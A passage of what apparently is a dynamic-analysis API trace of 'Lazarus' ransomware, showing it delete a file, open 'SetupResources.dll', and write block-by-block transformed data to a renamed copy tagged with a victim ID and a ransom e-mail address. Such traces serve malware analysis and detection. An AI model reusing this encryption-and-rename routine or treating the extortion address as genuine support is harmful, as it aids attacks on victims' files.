RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0061.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 45 [0061.986] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml")) returned 1 [0061.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0061.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0061.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0061.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0061.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b680 | out: hHeap=0x20000) returned 1 [0061.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0061.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0061.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0061.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.987] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.987] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.987] FindNextFileW (in: hFindFile=0x78210, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0061.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0061.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0061.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0061.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0061.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.988] AreFileApisANSI () returned 1 [0061.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1030\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1030\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0061.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0061.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0061.989] AreFileApisANSI () returned 1 [0061.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0061.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 46 [0061.989] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.989] GetFileType (hFile=0x428) returned 0x1 [0061.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.989] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0061.989] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0061.989] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0061.990] CloseHandle (hObject=0x428) returned 1 [0061.990] AreFileApisANSI () returned 1 [0061.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x716f0 [0061.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x716f0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 46 [0061.990] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.990] GetFileType (hFile=0x428) returned 0x1 [0061.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0061.990] CloseHandle (hObject=0x428) returned 1 [0061.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.991] AreFileApisANSI () returned 1 [0061.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a98 [0061.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 46 [0061.991] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758)) returned 1 [0061.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0061.991] AreFileApisANSI () returned 1 [0061.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0061.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0061.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0061.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0061.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0061.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0061.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0061.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0061.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.999] GetLastError () returned 0x0 [0061.999] SetLastError (dwErrCode=0x0) [0061.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e148 [0061.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x84fb8 [0061.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b8b0 [0061.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0061.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0061.999] GetLastError () returned 0x0 [0061.999] SetLastError (dwErrCode=0x0) [0062.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0062.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0062.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71758 [0062.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0062.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0062.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0062.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0062.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0062.000] AreFileApisANSI () returned 1 [0062.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0062.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x51398 [0062.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0062.000] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0062.000] GetFileType (hFile=0x428) returned 0x1 [0062.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0062.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0062.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0062.001] AreFileApisANSI () returned 1 [0062.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0062.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71688 [0062.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 46 [0062.001] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0062.001] GetFileType (hFile=0x420) returned 0x1 [0062.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0062.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0062.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0062.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.001] GetLastError () returned 0x0 [0062.001] SetLastError (dwErrCode=0x0) [0062.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0062.001] GetLastError () returned 0x0 [0062.001] SetLastError (dwErrCode=0x0) [0062.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0062.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0062.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0062.002] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0062.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0062.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d660 [0062.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0062.098] GetLastError () returned 0x0 [0062.098] SetLastError (dwErrCode=0x0) [0062.098] GetLastError () returned 0x0 [0062.099] SetLastError (dwErrCode=0x0) [0062.099] GetLastError () returned 0x0 [0062.099] SetLastError (dwErrCode=0x0) [0062.099] GetLastError () returned 0x0 [0062.099] SetLastError (dwErrCode=0x0) [0062.099] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.184] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.185] GetLastError () returned 0x0 [0062.185] SetLastError (dwErrCode=0x0) [0062.185] GetLastError () returned 0x0 [0062.185] SetLastError (dwErrCode=0x0) [0062.185] GetLastError () returned 0x0 [0062.185] SetLastError (dwErrCode=0x0) [0062.185] GetLastError () returned 0x0 [0062.185] SetLastError (dwErrCode=0x0) [0062.185] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.185] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.186] GetLastError () returned 0x0 [0062.186] SetLastError (dwErrCode=0x0) [0062.186] GetLastError () returned 0x0 [0062.186] SetLastError (dwErrCode=0x0) [0062.186] GetLastError () returned 0x0 [0062.186] SetLastError (dwErrCode=0x0) [0062.186] GetLastError () returned 0x0 [0062.186] SetLastError (dwErrCode=0x0) [0062.186] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.186] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.187] GetLastError () returned 0x0 [0062.187] SetLastError (dwErrCode=0x0) [0062.187] GetLastError () returned 0x0 [0062.187] SetLastError (dwErrCode=0x0) [0062.187] GetLastError () returned 0x0 [0062.187] SetLastError (dwErrCode=0x0) [0062.187] GetLastError () returned 0x0 [0062.187] SetLastError (dwErrCode=0x0) [0062.187] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x758, lpOverlapped=0x0) returned 1 [0062.187] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.187] GetLastError () returned 0x0 [0062.187] SetLastError (dwErrCode=0x0) [0062.187] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0062.188] GetLastError () returned 0x0 [0062.188] SetLastError (dwErrCode=0x0) [0062.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0062.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d750 [0062.188] GetLastError () returned 0x0 [0062.188] SetLastError (dwErrCode=0x0) [0062.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d660 | out: hHeap=0x20000) returned 1 [0062.188] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327ef70*=0x760, lpOverlapped=0x0) returned 1 [0062.188] GetLastError () returned 0x0 [0062.188] SetLastError (dwErrCode=0x0) [0062.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0062.188] GetLastError () returned 0x0 [0062.188] SetLastError (dwErrCode=0x0) [0062.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0062.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0062.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d750 | out: hHeap=0x20000) returned 1 [0062.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0062.188] HeapFree (in: 